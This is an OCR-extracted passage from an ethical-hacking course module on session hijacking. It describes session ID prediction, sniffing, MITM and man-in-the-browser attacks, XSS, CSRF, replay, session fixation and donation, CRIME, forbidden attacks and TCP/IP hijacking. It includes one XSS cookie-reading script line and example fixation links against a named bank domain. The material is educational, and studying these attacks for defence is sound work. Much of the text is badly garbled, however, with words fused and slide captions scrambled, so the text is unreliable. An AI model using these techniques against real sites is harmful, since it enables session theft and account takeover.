are effectiveonlywhenservers use weakor flawed
session-IDgeneration mechanisms.
Brute forcing: In the brute-force technique, an attacker obtainssession IDs by
attemptingall possible
permutations of session IDvaluesuntil finding
one that works.An
attackerusinga digitalsubscriberline(DSL) up to 1,000sessionIDsper
can generate
second.Thistechnique is most usefulwhenthe algorithm that produces session IDsis
‘non-random,

hep wens mysie.com/view/VW30822101518903

com)
itp:/iwewew.mopsite.
view/WW/80422101520008
Ietp//wwen.mysite.com/viw/VW/30822101522507
Figure117:Brte-forcing
attackontheSesion IDof user
shownin the abovefigure,
‘As a legitimate user connects to a server with session ID
\vw30422101522507. Employing various combinations suchasVW30422101518909 and
\vw30422101520803, an attackerattempts to bruteforcethe session ID i n the hopeof
arriving at the correct session ID. Oncethe attackerobtainsthe correct
eventually

ical andCountermensores
Mackin ©by E-Comel
Copyright
 sessionID,they
gaincomplete
accessto dataandcan perform
the user’s operations
on
behalfof the legitimate
user.

Note: A session ID brute-forcing

attackis knownas a session prediction
attackif the

A
predicted
of
range values
small
for a sessionID is very
session token can be compromisedi n various ways:

Session sniffing replay Session attack

=

=
session
Predictable

(MITM)
attack
Man-in-the-middle
Session
fixation
token

CRIME
attackattack
=

Cross-site
attack Forbidden
Man-in-the-browser
(XSS)
scripting attack Session
attack
donationattack
forgery
Cross-siterequest attack

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SessionIDs using Sniffing
Compromising and byPredicting
SessionToken

Session by Session
Compromising
‘ering
Sniffing Session IDs Compromising
Predicting
IDs
Token

aval can
(©Anattackerutes a snr to capture session
tokenor session 0
tacks predict
sesion Ds generated
lgorthmsandimpersonate
a website
user
byWeak

(©
tain unauthorized Ds
T e attackerthenuses thevalid
token sessionto
acess tothewebserver
‘tacks
aaah ale
variablesectionsof
analyte
on
sion to

bert ‘The
analysis
i s performed

cyplanalytc
tools,
manualy various
or using

IDsto gather
Session samples
inthesare tine
‘window
andkeepthevariable
constant

SessionIDs Using
Compromising Sniffing
web server identifiesa user'sconnection through
‘A a unique session ID (also
knownas a
session token).
Thewebserver sendsa sessiontokento theclientbrowser
afterthesuccessful

the body
of
authentication client login. Usually,
of an HTTPrequisition.
a sessiontokencomprises
a stringof variablewidththat
(cookie),
is usefuli n various ways,suchas i n the headerof an HTTPrequisition i n a URL,
or i n

attackeruses
‘An packet
sniffing PacketAnalyzer
toolssuchas Wiresharkand SteelCentral to
intercept thenanalyzes
theHTTPtrafficbetweena victim andwebserver. Theattacker the data
inthe captured packets to identify
valuableinformationsuchas session IDsand passwords.
Oncethe session ID is determined, the attackermasquerades as the victim and sendsthe
sessionIDto theweb server beforethe victim does.Theattackerusesthevalidtokensessionto
gain unauthorizedaccess to the web server. In this manner, the attackertakescontrolover an
existing
session.
legitimate

Figure
11.8:Prediction
of session 10by sniffing

ical andCountermensores
Mackin ©by E-Comel
Copyright
Compromising SessionIDs byPredicting SessionToken

Asession ID is tagged

possible.
as proof

Sessionprediction
of an authenticatedsession established
server. Thus,if an attackercan guessor
predict
betweena user
the sessionID of the user, fraudulent
enablesan attackerto bypass
andweb
activityi s
the authenticationschemaof an
application.Usually,attackersc an predictsession IDs generated byweak algorithms and
impersonate a websiteuser. Attackersanalyzea variablesection of session IDsto determine
the existence of a pattern.This analysis
is performed eithermanually or byusingvarious

cryptanalytic
tools.
high
attackercollecta
‘An numberof simultaneous session IDs to gather samples
i n the same
time windowandkeep the variable the attackercollectssome validsessionIDs
constant. First,
that are usefulin identifying authenticatedusers. Theattackerthen studiesthe session ID
structure,the information usedto generate it, and the algorithm usedbythe web application
to secure it. From thesefindings,
attacker
the can predict the session ID.
Attackerscan alsoguesssession IDs byusinga brute-forcetechnique, i n whichthey
generate
andtest differentsessionIDvaluesuntil theysucceed
i n gainingaccessto the application,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 How to Predicta SessionToken

(©Mostwebservers
(©
An attacker
use

theunique
guesses
custom
algorithms
the
ora

valueoF deduces
session
predefined
patter
session 1 0to hijack
the session

Snel
Captures
sever
Anattacarcoptures
fevioniDsandanaaesthe
mm
|| netp:/ encefLadhacher.con/viaw/JOEX18082019152020
REED:
BEED=//eww
np oee
Som/visw/ @0e2019153020
com/visw/Snexigoez019160020
Som/viw/onsxlaoez0i9i64020

Predicts
1 16:2555on August 23,201
the attacker can successtlly
com/vtew/J82%23082019162555,
eep://smme.cortstsedhacker
rede he sesion 1D

How to Predicta SessionToken

Mostweb servers generate session IDsusing custom algorithms
or a pre-defined
patternthat
mightsimply increase static numbers, whereas othersuse more complexproceduressuchas
factoring
i n time andother computer-specific
variables.Thus,
attackerscan identify
sessionIDs
generated
i n thefollowing ways:
Embedding
‘= i n the URL,whichis receivedbya GETrequest
i n the application
whenthe
linksembeddedwithin a page are clickedbyclients
=

Embedding
hidden
field, HTTP’s
in a
command
formas a whichis submittedto the POST
‘=

Embedding
cookies
the
client’s
in
Anattackerguesses
on localmachine
the uniquesessionvalueor deducesthe sessionIDto hijackthe session.AS
showni n the below figure,an attackerfirst capturesseveralsession IDs and analyzesthe
pattern,

http://www.
http://www. .com/view/JBEX180
certifiedhacker

http://www.certifiedhacker
.com/view/JBEX180
certifiedhacker .com/view/JBEX18082019160020
http://www.certifiedhacker
.com/view/JBEX180 Constant Date Time.
gue 11.9 Sample
sessions by
captured an attacker

Module8 1294
Page ical andCountermensores
Mackin Copyright
by E-Comel
©
Onanalyzing successfully
23,2019,theattacker
the pattern,at 16:25:55on August
session ID,as shownin the belowfigure.
predicts
the
http://www.certifiedhacker .com/view/JBEX23082019162555
Constant Date Time
11.10Session
Figure
Now,theattackercan mount an attackthrough
IOpredicted
bythe
the following
steps.
attacker
The attackeracquiresthe current session IDandconnectsto theweb application.
=
Theattackerimplements technique
a brute-force or calculates
the next session ID.
‘=
Theattackermodifiesthe current value i n the cookie/URU/hidden
form field and
assumesthe next user'sidentity.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SessionIDs Using
Compromising Man-in-the-Middle Attack

\© Themann-the-midale
attacksuse to intrudeInto an existing
connection andinte
betweensystems
being
themessages exchanged

| the TCP
After
sttackercan
ofthe connection,
nercepton an
rad, most,andinser froudlent

|
case
the
and
inthe ofantp transaction,
between cet
Connection
theTCP
theserver

SessionIDs Using
Compromising Man-in-the-MiddleAttack
‘A
man-in-the-middle (MITM) attackis used to intrude into a n existingconnection between
systems andto intercept messages being transmitted.In this attack,attackers
u se different
techniques andsplita TCPconnectioninto two: a client-to-attackerconnection andan attacker-
to-server connection.After the successful interceptionof a TCP connection,an attacker can
read,modify, and insert fraudulentdata into the interceptedcommunication.In the case of an
HTTPtransaction,the TCPconnection betweentheclientandserver is the target.

Gient-to-s
1.

Figure 11.11:
of
Prelietion session
1D sing a manin-the-midle (MIT) attack

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SessionIDs Using
Compromising Man-in-the-BrowserAttack

thebrowserandits security aor

attack usesTrojan
Theman-in-the-browser
m echanisms
h orseto interceptthe callsbetwaen
libraries

It works withan already

m echanisms
its security and
Trojan
installed horse actsbetween
the browserand

©Itsmain objective
is to cause financial bymanipulating
deceptions transactions
of internetbankingsystems

Steps
to Perform Man-in-the-Browser Attack

Compromising
SessionIDs UsingMan-in-the-BrowserAttack
attackis similarto
A man-in-the-browser MITM attack.Thedifference
an betweenthe two is
that a man-in-the-browser
attack uses Trojanhorseto interceptand manipulate
a calls
betweena
browser
installedTrojanand its securitymechanisms or libraries.An attackerpositions
betweenthe browserand its security
pagesandtransaction content or insert additional
‘web
mechanism, andthe Trojan
a previously
can modify
transactions.AlloftheTrojan’s
activities
are
to web
invisible boththe user and application.
ical andCountermensores ©
Mackin by E-Comel
Copyright
The main objective of thisattack is financial
theft bymanipulatingtransactions made using
Internet banking systems.A man-in-the-browser attackcan succeedeven i n the presence of
security mechanisms suchas SSL,public keyinfrastructure
(PKI),
andtwo-factor authentication
because all the expected
controlsandsecurity mechanisms wouldseem to functionnormally.
to PerformMan-in-the-Browser
Steps Attack:
‘=

=
The
Trojan
first
infects software
computer's
or
application).
the
The Trojaninstallsmalicious
(OS
files)and saves it
code (extension in the browser
configuration.
the maliciouscodei n the formof extension files is
After the user restarts the browser,
loaded.
a handlerfor every visit to a webpage.
Theextensionfilesregister
the extension matchesi ts URLwith a listof knownsitestargeted
Whena pageis loaded,
for
attack
Theuser logs
i n securely
to thewebsite.
a button event handlerwhena specific
Theextension registers pageload is detected
pattern
itwith list.
witha specific andcompares its targeted
Whenthe user clickson the button, the extension uses the DocumentObjectMode!
{DOM)interfaceandextracts all thedatafromallformfieldsandmodifiesthe values.
Thebrowser sendsthe formandmodified valuesto theserver.
Theserver receives the modified
valuesbut cannot distinguish
betweenthe original
and
modifiedvalues.
Aftertheserver performs thetransaction,a receiptis generated,
Now,thebrowser receives the receipt
forthe modified transaction.
Thebrowserdisplays the receiptwiththe original
details.
Theuser believesthat the original
transaction was receivedbythe server without any
interception.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Compromising
SessionIDs Using
Client-side Attacks

Cross-SitScripting
0X55)
(8
XSs
enables
the web
malicious
attackersto inject
pagesviewedbyotherusers
dientside
seit into

‘Malicious Codes
JavaSeript

anywarning,
fenerate but captures
sexsion tokensithe
andsends
backeround themtotheattacker

Trojans
to sendallthesessions the attacker's machine
through

SessionIDs Using
Compromising Client-sideAttacks
Client-sideattackstargetvulnerabilitiesi n client applications that interact with a malicious
server or processmalicious data.Depending on the nature of vulnerabilities, an attacker can
exploitan application
visitinga maliciouswebsite.
JavaRuntimeEnvironment,
an a
bysendingemailwith maliciouslinkor otherwisetricking
Vulnerableclient-side applications includeunprotected
a user into
websites,
andbrowsers;of these,browsersa re the majortarget.Client-side
attacksoccur whenclientsestablishconnections with maliciousservers andprocess potentially
harmfuldatafromthem.If no interaction occurs betweenthe clientand server, then there is
no scopefor a client-sideattack.One suchexample is runninga FileTransferProtocol(FTP)
clientwithout establishing
applicationis configured
it susceptible
a
connection to an FTPserver. In the case of instant messaging,
i n sucha way that it makes
to client-side attacks.Thefollowing client-sideattackscan beusedto compromise
the
clientsto logi n to a remote server, making

session IDs.
*
scripting(XSS):
Cross-site XSSenablesattackersto injectmaliciousclient-sidescripts
into web pagesviewedbyother users.
JavaScript
‘Malicious codes:Anattackerc an embedi n a web page a malicious
scriptthat
doesnot generateany warning but captures s essiontokensi n the background and
sendsthemto theattacker.
Trojans:A Trojanhorsecan change
the proxy settings
i n the user’s
browserto sendall
sessionsthroughan attacker’s
machine.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 8
Module 1400
Page tical andCountermensores
Making by Comet
Copyright©
 Compromising SessionIDsUsing
Client-sideAttacks:
Cross-siteScript
Attack

(Gan
attacker
crafted
sends lnk tothe victim with maiousavaScrp,
bythe atacker whenthevictimchekan the link
the instructionsm ade
theJavaScript
wilrun and complete

SessionIDs Using
Compromising Client-sideAttacks:Cross-siteScript
Attack
A cross-sitescriptattackis a client-sideattacki n whichthe attackercompromises a session
tokenbyusingmalicious codeor programs.Thistypeof attackoccurs whena dynamic web
pagereceives maliciousdatafromtheattackerandexecutesit on theuser'ssystem.
Websites that create dynamic pagesdo not havecontrol over how the clientsread their
output.Thus,attackerscan insert a malicious JavaScript, ActiveX,
VBScript, Hypertext Markup
Language (HTML), or Flashapplet
scripto n the user'smachine
redirectsusers to unexpected
into a vulnerabledynamic
and collectspersonal
page. Thatpage then
information
the
of the user, stealscookies,
web pages,or executesany maliciouscodeon the user'ssystem.
executes
showni n the belowfigure,
‘As a user first establishesa valid session with a server. An attacker

a link
sendscrafted to the victim with
JavaScript
displays
runs automaticallyand performs malicious
JavaScript. Whentheuser clickson the link,the
the instructions set bythe attacker.The result
the current sessionID of the user. Using thesame technique, the attacker can create
specific
JavaScript
codethat fetchesthe user'ssession ID:
<SCRIPT>alert
Thereafter,
(document. cookie);</SCRIPT>
the attackeruses thestolensession ID to establisha validsession with the server,

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Compromising SessionIDsUsing Client-sideAttacks:
Cross-siteRequest
Forgery Attack

©.
The Crosesite
Request
to performmalicious
Forgery
activities attack
exploits
(CSRF) thevictim'sactivesession witha trustedsite

<Q AEE

SessionIDs UsingClient-side Attacks: Cross-site Request

Compromising
Forgery
Cross-site
Attack
requestforgery(CSRF),alsoknownas a one-clickattackor sessionriding, is an attack
i n whichthe attackerexploits the victim’sactive session with a trusted site to perform
maliciousactivities suchas item purchases and the modificationor retrieval of account
information.In CSRFweb attacks, the attackercreates a host form,containing malicious
Information, andsendsit to theauthorized user. Theuser fills in the formandsendsit to the
‘web
server. Becausethe data originates from a trusteduser, the web server accepts the data.
Unlikean XSSattack, whichexploits thetrust a user hasfora particular website,
CSRF exploits
the trust that a websitehason a user’s
browser.A CSRF attackinvolvesthe following steps.
=
Theattackerhostsa web pagewith a formthat appearslegitimate.
Thispagealready
contains theattacker'srequest,
‘A.user,
believing theformto bethe original,
enters a login andpassword,
the user completes
‘Once the form,that pageis submittedto the realsite.
Therealsite’s
server accepts the form,assuming that it was sent bythe user basedon
the authenticationcredentials.
In this manner, the server theattacker'srequest.
accepts

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SessionIDs Using
Compromising SessionReplay
Attacks
(©Inasession replayatac, the attackerstens to theconversationbetweenthe wer andtheserver and
captures theauthentication
tokenoftheuser

|@ Oncetheauthentication
tokenscapture,the atackerreplays
uthentcationtokenand gansunauthorized
the
access tothe server request
tothe server withthecaptured

SessionIDs Using
Compromising SessionReplay
Attacks
Ina sessionreplay
attack, the authenticationtokenof a user bylistening
the attackercaptures
to.a conversation betweenthe user andserver. Oncethe authenticationtoken is captured, the
attackerreplays the authenticationrequestto the server with the captured authentication
tokento dodge the server; consequently,
theygainunauthorizedaccess to the server. A session
replay
attack
involves
=
following the
Theuser establishes
steps.
a connection withthe web server.
=
Theserver asksthe user forauthenticationinformationas identity proof.
=
Theuser sendsauthenticationtokensto the server. In thisstep,a n attackercaptures
the
authenticationtoken of the user byeavesdropping o n the conversation betweenthe
user andserver.
Oncethe authenticationtoken is captured, the attackerreplays the requestto the
server with the captured authenticationtoken and gainsunauthorizedaccess to the
server

Figure
11.15:
Prediction
of session

ical
2
1Dusingsession replay
attack

andCountermensores
Mackin ©by E-Comel
Copyright
 j
SessionIDs Using
Compromising SessionFixation CEH
(©eps aserver
that
lows
aeset
T e atace
awd
hevlnrobityo usa SO

SessionIDs Using
Compromising SessionFixation
Websession security preventsa n attackerfrom intercepting, brute forcing,
or predicting the
sessionID issued bya webserver to a user’s browseras proof of an authenticatedsession
However, this approach ignoresthe possibilityof the attackerissuinga sessionID to the user’s
browser,forcing it to use thechosen s essionID. Thistypeof attackis calleda sessionfixation
attackbecausean attackerfixesthe user'ssession ID in advance, instead
of generating it
randomly at of
the time login
Theattackerperforms a sessionfixationattack to hijacka valid user session.Theattacker
takes
advantage of limitationsi n web-application session ID management. Webapplications allow
the user to authenticate themselves usingan existingsessionID,instead of generating
a new
session ID.In this typeof attack, the attackerprovidesa legitimate web-application
sessionID
andluresthe victim to use it. If thevictim'sbrowseruses that session ID,thenthe attacker can
hijack s essionbecausethe attackeris already
the user-validated aware of the sessionID used

by
the
victim.
{A sessionfixationattackis a kindof session hijack. insteadof stealing
However, the session
establishedbetweena user andweb server afterthe user logs in, a session fixationattackfixes
an establishedsessionon theuser’s
browser; thus,the attackis initiated beforethe user logs in
attackeru sesvarious techniques
‘An to performa sessionfixationattack:
+

+
Session
tokenin the URLargument

Sessionfield
tokenin a hiddenform
+
IDin a cookie
Session
Theattackermust choosea technique
basedon howthe targetweb application usessession
tokens.Theattackerexploits
the vulnerability
of a server that allowsa user to use a fixed

ical andCountermensores
Mackin ©by E-Comel
Copyright
session ID.Then,the attacker provides a valid session ID to a victim and lureshim to
using that session ID.A session fixationattackhasthe following
authenticatethemselves three
phases,
‘=
Sessionset-upphase: In this phase,the attackerfirstobtainsa legitimatesessionID by
establishing
a connection with the target web server. Few web servers supportthe idle
sessiontime-out feature.If the targetweb server supports this feature,the attacker
needsto sendrequests repeatedly to keep the established
trapsession ID alive.
Fixation phase: In this phase, the attackerintroduces the session ID to the victim's
browser,thereby fixingthe session.
‘=
Entrancephase: In this phase, the attackerwaits for the victim to logi n to the target,
webserver usingthetrapsessionIDandthenenters thevictim’s session,
A sessionfixationattackis performed through following
the steps.
‘First,the attackerestablishes a legitimateconnection with the targetweb server.
The targetweb server (eg, http://citibank.com/) issues a session 1D,say
(06441
FEA4496C2, to theattacker.
The attackersendsa link with the establishedsession ID, say http://citibank.com/?
SID=0D6441FEA4496C2, to the victim andluresthe victim to clickon it to access the
website
Thevictim clickson the link,believingit to be a legitimate
link sent bythe bank.This
the server's
‘opens loginpagei n thevictim’s
browserforSID=0D6441FEA4496C2,
Thewebserver checks thatthesessionID0D6441FEA4496C2 established
is already and
is i n a n active state;hence,
it doesnot create the new session.
the victim enters their login
Finally, credentialsi n thelogin
script,andthe server grants
themaccessto the bankaccount.
this point,knowing
‘At the session ID,the attackercan also access the victim'sbank
account via http://citibank.com/?SID=0D6441FEA4496C2.
the sessionID is set bythe attackerbeforethe user logged
Because in, the user can besaidto
havelogged
into theattacker'ssession.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Ro Vietim

Module8 1408
Page ical andCountermensores
Mackin
©
by E-Comel
Copyright
 SessionHijacking ProxyServers
Using
(©Anattacker ures
bogus
‘on
a
the vt
link,whichlooks
betredirects
Teptimate theuser
tocick
to
“athe

the egiimate
server on Behaof
thei tm andserves as pronyfor

The
attacker
captures
then
Ingracton ofthe egimate
sever
the
see nee ee

SessionHijacking
Using Servers
Proxy
‘An
attackerluresthe victim to clickon a fake link,whichappears legitimate
but redirectsthe
userto

attacker
theattacker's

captures
server. Theattacker
then forwards

the sessioninformationduring
to the legitimate
therequest server on
behalfof the victim and serves as a proxy for the entire transaction. Acting
a s a proxy, the
the interactionbetweenthe legitimate server
anduser.
hree"ht/fresvoadquys.com/gotchaghp">
“ca

vietim

|
AttackerServer
(reallybadguys.com)
"Sac
iperinie
eavbaoaian Legitimate
Server
amazon.com)
11.17:
Figure Session
hijacking
usingpronyservers

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SessionHijacking CRIMEAttack
Using
‘ata (CRIME)
attack
that resent
inthe
ompceson Rati nfo Lek MadeEat
festre ofprotocols
compression sich at
a clentlde
SUT, SPDY
a ndT P S
explo thevnerabies

‘The
information
obtained
romcooked
testable
autherlation
sesion
appli thesession anew wth theweb

SessionHijacking CRIMEAttack
Using
Compression
Ratio Info-Leak Made Easy(CRIME)
is a client-sideattack that exploits
vulnerabilities featureof protocols
in the data-compression suchas SSL/Transport Layer
Security
(TLS), SPDY, and HTTPSecure(HTTPS).The possibility
of mitigation
againstHTTPS
compressionis low,which makesthis vulnerabilityeven more dangerous than other
compression vulnerabilities.
When two hostson the Internet establish2 connection using HTTPS, a TLSsession is
established,and the data are transmittedin an encrypted form.Hence, it is difficultfor an
attackerto reador modify the messagesbetweenthe two hosts.Whena user logsinto a web
application,authentication dataare storedin a cookie. Whenever thebrowser sendsa n HTTPS
requestto the webapplication, the storedcookieis usedfor authentication.In this attack,the
attackerattemptsto accesstheauthenticationcookieto hijack the victim’s
session.
In HTTPS, cookies are compressed usinga lossless datacompression algorithm (DEFLATE) and
then encrypted. Hence,it is difficult for an attackerto obtainthe valueof the cookiewith
simple
sniffing,
To perform a CRIMEattack, a n attackermust use socialengineeringtechniques to trick the
victim into clicking
on a malicious link. Whenthe victim clickson the maliciouslink,i t either
injectsmaliciouscodeinto the victim'ssystem or redirects
the victim to a maliciouswebsite. If
the victim hasalready establishedan HTTPS connection with a securedweb application, the
attackersniffsthe victim’sHTTPStrafficusingtechniques suchas ARPspoofing. Through
sniffing,the attackercaptures the cookievaluefromthe HTTPS messagesandsendsmultiple
HTTPSrequests to the web application with that cookieprepended with a few random
characters.Subsequently, the attacker monitors the traffic betweenthe victim and web
application to obtainthe compressed andencrypted value of the cookie.Aftercapturing the

ical andCountermensores
Mackin ©by E-Comel
Copyright
 the attacker analyzes
cookie, the cookielengthand predicts
the actual valueof the
authenticationcookie,
After obtainingthe authenticationcookie,
the attackerimpersonates the victim and hijacks
the
session with the secure web application
victim’s to steal confidentialinformationsuchas
passwords, socialsecurity numbers, and credit card numbers.Attackersuse tools suchas
CrimeCheck to detectwhethera web server hasTLSor HTTP compressionenabledandare thus
vulnerableto CRIMEattacks.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SessionHijacking ForbiddenAttack
Using
(2 Aforbidenattacka typeofmann
(©Ieexpots
thereuse oferptographic
attack
the-midle

during
nonce the TLS
t o ick HTTPS
used
h andshake
s esions

todcovesentive information,
as
such bankaccountu mber, passwords,
andsci ecuty numbers

SessionHijacking UsingForbiddenAttack
Aforbiddenattack typeof MITM attackthat can beexecutedwhena cryptographic
is a nonce is
reusedwhileestablishing
an HTTPSs essionwith a server. According
to the TLSspecification,
thesearbitrarypiecesof data must beusedonce, Thisattackexploits the vulnerability
that the
TLSimplementation incorrectlyreuses the same nonce whendata are encrypted usingthe
Encryption
‘Advanced Standard-Galois/Counter Mode (AES-GCM) duringthe TLShandshake.
Attackersexploitthisvulnerability
to perform an MITM attackbygenerating cryptographic
keys
usedfor authentication.Repeating the same nonce duringthe TLShandshakeallows an
to
attacker monitor andhijack
the protection,
as JavaScript
the
the connection, After hijackingHTTPSsession and bypassing
attackersinjectmaliciouscodeand forged content into the transmission,
code or web fieldsthat promptthe user to disclosepasswords,
such
socialsecurity
numbers, or otherconfidentialinformation. A forbidden attackinvolvesthe followingsteps.
=
Theattackermonitors the connection betweenthe victim andweb server andsniffsthe
nonce fromthe TLShandshake messages.
Theattacker generatesauthentication keys
usingthe nonce andhijacks the connection.
All the trafficbetweenthe victim andweb server flowsthrough theattacker'smachine.
TheattackerinjectsJavaScript code or web fields into the transmission towardsthe
victim,
Thevictim reveals
sensitive information
suchas bankaccount numbers,
passwords,
and
socialsecurity
numbersto theattacker.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 Figure
11.19: hijacking
Session
attack
3 forbidden
using

Module8 1412
Page ical andCountermensores
Mackin
©by E-Comel
Copyright
SessionHijacking SessionDonationAttack
Using
In a session donationattack,
theattackerdonatestheir own session IDto the targetuser. In this
attack, firstobtainsa validsessionID bylogging
theattacker into a service and laterfeedsthe
samesessionID to the targetuser. ThissessionID linksa targetuser to the attacker'saccount
pagewithoutdisclosing any informationto thevictim. Whenthetarget user clicks
o n the link
and enters the details (username, password, paymentdetails,etc.)i n a form,the entered
detailsare linkedto the attacker'saccount. To initiate this attack,
the attackercan sendtheir
sessionID usingtechniques suchas cross-sitecooking, an MITM attack,andsessionfixation.A
session donationattack
involvesthe following
steps.
a legitimate
First,the attackerlogsinto a service, establishes connection withthetarget
web server,anddeletesthe storedinformation,
The targetweb server (e.g,http://citibank.com/)
issues a session 1D,say
to theattacker.
(06441FEA4496C2,
The attacker. ~—sthen~—donates_-—stheir_-—
session ID,_—say
ttp:/citibank.com/?SID=006441FEA4496C2,
to the victim andluresthe victim to click
on it to accessthewebsite,
Thevictim clickson the link, believing it to be a legitimate
link sent bythe bank.This
the page
‘opens
the
server's i n victim’s browser with SID=0D6441FEA4496C2.
victim enters theirinformationin the pageandsavesit
Finally,
the

Theattackerc an now login

as themselves
andacquire thevictim’s
information.

ical andCountermensores
Mackin ©by E-Comel
Copyright
11.20 Session
hijacking
using sesion donation
attack
 ModuleFlow

[NetworkLevel So
01 Session Hijacking
Concepts Sues

02 Application
Lavel 5
ijacking

05 Countermeasures

Network Level Session Hijacking

"WD
re
anspor
and
internet
protocol
network ive hacking
inthe apleatonayer
rales
on ijckng usedbywebapplatons

Bd aang
tev gathers
oy
some
information,
he network
toattacktheappleaton
sessions, the tater
levelsssone
tal whichare sed

Network level hijacking

includes:

Blindniseking BDistiacking
BLvor acting ED Man-inshe
mide:
Packet snifer

EXteo7 tacking El source

packets
spoofing: outed

Network Level SessionHijacking

Attackersespecially focuson networklevel session hijacking
becauseit doesnot requirehost
access,in contrast to host-levels essionhijacking,
or a needto tallor their attackson a per-
applicationbasis,
i n contrast

This section discusses

to
applicationlevelhijacking.
networklevel session hijacking,
conceptsrelatedto network
communications,andvarious techniques
usedto perform
networklevelsessionhijacking.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Network level hijacking relies on hijackingtransportand Internet protocolsused byweb
applicationsi n the applicationlayer.
Byattacking networklevelsessions,the attackergathers
some criticalinformationthat is usedto attackapplication
levels essions.
are differenttypesof networklevelhijacking
Thefollowing

hijacking
UDP
+

+
Blind
hijacking
+

+
RSThijacking
Man-in-the-middle:
packet
sniffer
TCP/IP
+

‘Three-way
hijacking
Handshake
+
IP spoofing:
sourcerouted packets

Whentwo parties establisha connection usingTCP, theyperform a three-way handshake.A

three-way handshakestarts the connection and exchanges
all the parameters neededforthe
to communicate.TCPuses a three-way
two parties handshaketo establisha new connection.

Initially,
the client-sideconnection is i n the closedstate andthe server-side i n the listening
state. Theclient initiates the connection bysending the initial sequencenumber(ISN) and
settingthe SYNflag. Theclientis now i n the SYN-SENT state.

‘When theserver receives thispacket,it acknowledges theclient sequencenumberandsends

its own ISNwith the SYNflagset. Theserver'sstate is now SYN-RECEIVED. On receiptof this
packet, theclientacknowledges theserver sequencenumberbyincrementing it andsetting
the
‘ACKflag.Theclient is now in the establishedstate. At this point,the two machineshave
established a sessionandcan communicate.

Onreceivingthe client’sacknowledgement, the server enters the established

state and sends
an acknowledgment, the client'ssequence
incrementing number.Theconnection can beclosed
either
by
usingRST
or
theFINor flagthrough
If the RSTflagof a packet
atime out.
is set, the receivinghost enters the CLOSED
state and freesall
resourcesassociated with this connection. Thisleadsto the connection dropof any additional
incomingpackets.
If the packetis sent with the FIN flagturned on, the receivinghostclosesthe connection
becauseit enters the CLOSE-WAITstate. The packets sent bythe client are accepted i n an
established
connection if the sequence numberis withinthe rangeandfollowsits predecessor.
If the sequencenumberis beyond
packet andsendsan ACKpacket of
usingtheexpected
sequencenumbers,
the range the acceptable
number.
sequence
it drops
the

Forthethreeparties the following

to communicate, information
is required:
*
Paddress
=
Portnumbers
=
numbers
Sequence
It is easyfor an attackerto determine theseare available
the IPaddressand portnumber; in
the IP packets,whichdo not change throughoutthe session. However,
the sequence numbers
change. Therefore, the attackermust successfully
guessthe sequencenumbers for a blind

ical andCountermensores
Mackin ©by E-Comel
Copyright
hijack.
Ifthe attackercan foolthe server into receivingtheirspoofed
packets
and executing
i n hijacking
them,the attackeris successful the session.

i] SNACK,ACK 4001,SEQ 7000

Bob
[ACK,
ACKH
7001,S EQ
40021
11.21:Three-way
Figure handshake

three-way
‘The handshake
showni n theabovefigure thefollowing
involves steps.
1. Bobinitiates a connection with the server andsendsa packet
to the server with the SYN

flag
set.
Theserver receives thispacket with theSYN+ ACKflag
andsendsa packet andan initial
sequence number(ISN)for theserver.
Bob sets the ACKflagacknowledging the receiptof the packet
and increments the
sequence numberby1.
4, Thetwo machines havesuccessfully
establisheda session.
the next sequence numberandACKnumberthat Bobwill send,
If the attackercan anticipate
theycan spoof
Bob'saddressandstart communicationwiththeserver.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 TCP/IPHijacking
(©:
{© using
TCP/IPjsehng
spoofed
volves
ofa
connection
between
and
communiate
with
connection hangs,
Avietin’s
packets

host's
asthe
atacer
andanatacker
to sete contol

Ie then ableto the

avtim

machine
targetmachine

{ Tolounch jackingtac, the attacker

a TCRNP must beonthesame networksthevein
(©:
server
Thetarget
and thev i i machines
canbeleatedanywhere

TCP/IP Hijacking
InTCP/IP
hijacking,
an attacker intercepts
an establishedconnection between two
byusingspoofed
parties
communicating packets
andthenpretendsto be one ofthoseparties.
In this approach, the attackeruses spoofed packets to redirectthe TCPtraffic to their own
machine. the victim'sconnection hangs,
Once this is successful, and the attackeris ableto
communicate with the host’s machineon behalfof the victim. To launcha TCP/IP hijacking
attack, both the victim andattackermust be on the same network.Thetarget server andthe
victim machines can belocatedanywhere. Byusingthistechnique, an attackercan easilyattack
systems that use one-time passwords. As illustrated i n the below figure,TCP/IP hijacking
Involvesthe following processes.
The
hacker
sniffs
ISN.
the communication betweenthe victim andhostto obtainthevictim's

using
By
host
system.
sendsa spoofed
thisISN,the attacker fromthe victim’s
packet to the
IPaddress

Thehostmachineresponds that the packet

to the victim,assuming arrivedfrom it. This
increments the sequence
number.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 ea Sar tasreog cn tion

Sic int sean. sesasea,

| Respond
with ACA hs ow SEQand

ackingproce
11.22:TCP/IP
Figure
hijacking
‘TCP/IP is performed
through
thefollowing
steps.
=
Theattackersniffsthevictim'sconnection anduses the victim’s
IP addressto senda
spoofedpacket
with the predictedsequencenumber.
the spoofed
The receiver processes packet,increments the sequencenumber,
and
sendsan acknowledgement to thevictim'sIPaddress.
Thevictim machineis unaware of the spoofed
packet.
Therefore,
it ignores the receiver
machine'sACKpacket andturns offsequencenumbercount.
Consequently, with theincorrect sequence
the receiver receives packets number.
The attacker forces the victim's connection with the receiver machineinto a
desynchronized
state.
spoofs
Theattackertrackssequencenumbersand continuously packets
that originate
fromthevictim’s
IPaddress,
Theattackercontinues to communicate with the receiver machine,
whilethe victim’s
connection hangs.

ical andCountermensores
Mackin ©by E-Comel
Copyright
 SourceRoutedPackets
IP Spoofing:

achet technique
source routing unauthorized
i usedfor gaining

a
aces to computer
with

by rom
the
hostserver
the
packet
wit number
aeady
ign packet oe a he receives asequence
sed the stacker

IP Spoofing:
SourceRoutedPackets
Sourcerouted packets are usefuli n gaining unauthorizedaccess to a computer with the helpof,
a trustedhost’s IP address. Thistypeof hijack allowsattackers to createtheir own acceptable
